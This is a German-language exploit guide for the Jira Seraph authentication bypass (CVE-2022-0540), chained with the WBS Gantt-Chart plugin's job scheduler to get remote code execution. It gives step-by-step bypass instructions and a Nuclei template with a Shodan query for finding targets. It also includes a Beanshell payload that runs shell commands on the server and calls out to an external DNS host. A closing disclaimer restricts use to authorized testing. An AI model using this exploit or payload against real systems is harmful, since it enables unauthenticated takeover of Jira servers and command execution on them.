
Atlassian Jira Seraph Authentifizierungsumgehung RCE(CVE-2022-0540)
Wie im Blog des Autors zu sehen, hat Atlassian eine lange Liste betroffener Plugins bereitgestellt (die überwiegende Mehrheit davon waren Fehlalarme), und der Autor hat mehrere tatsächlich betroffene Plugins aufgeführt.

Gemäß den angegebenen Bedingungen, kombiniert mit der offiziellen Dokumentation für WBS Gantt-Chart for Jira

Im Wesentlichen handelt es sich um eine RCE unter Verwendung des Beanshell-Skripts des Task-Moduls des Job-Schedulers. Die Exploit-Details sind wie folgt.
Proxy > Options > Match and Replace zu verwenden, um eine Regel zu bearbeiten.
http://IP:PORT/secure/WBSGanttManageScheduleJobAction.jspa;. Dann können Sie die Job-Scheduler-Konfiguration überprüfen.
Da unser endgültiges Beanshell-Skript als zeitgesteuerte Aufgabe ausgeführt wird, können Sie das Ausführungsintervall zu Ihrer Bequemlichkeit ändern, indem Sie auf "Edit" klicken und es im Cron-Format anpassen.


Nach Abschluss der Konfiguration klicken Sie auf "Update", aber es wird zur Login-Seite weitergeleitet. Keine Sorge, der Task wurde tatsächlich im Hintergrund hinzugefügt.

Der neu erstellte Task ist standardmäßig deaktiviert. Sie müssen ihn manuell auf "Enable" ändern und dann einige Sekunden warten, bis das Skript ausgeführt wird.

Gleichzeitig finden Sie im Job-Scheduler den Hinweis, dass die Ausführung abgeschlossen ist.

Voraussetzungen
WBS Gantt-Chart for Jira <= 9.14.3.1
id: CVE-2022-0540
info:
name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540)
author: DhiyaneshDK
severity: critical
description: |
Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
reference:
- https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0540
- https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0540
cwe-id: CWE-287
metadata:
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2022,atlassian,jira,exposure,auth-bypass
requests:
- method: GET
path:
- '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'WBS Gantt-Chart'
- type: regex
regex:
- '<td headers="name">([.|\D]*?)</td>'
dsl: []
- type: status
status:
- 200
Ausführungsdemo
nuclei -l targets.txt -t exploit.yaml
Screenshot

Beanshell-Skript
import java.io.IOException;
import java.lang.*;
Runtime runtime = Runtime.getRuntime();
try {
String command = "ping -nc 1 55d2721a.dns.1433.eu.org";
if (System.getProperty("os.name").toLowerCase().contains("windows")) {
runtime.exec(new String[]{"cmd.exe", "/c", command});
} else {
runtime.exec(new String[]{"/bin/bash", "-c", command});
}
} catch (IOException e) {
e.printStackTrace();
}
Die in diesem Artikel genannten Informationen sind ausschließlich für legitime, autorisierte Penetrationstests, interne Sicherheitsprüfungen von Unternehmen und Forschungszwecke bestimmt. Der Benutzer ist für alle nachteiligen Folgen verantwortlich, die aus der Nutzung der in diesem Artikel bereitgestellten Informationen entstehen.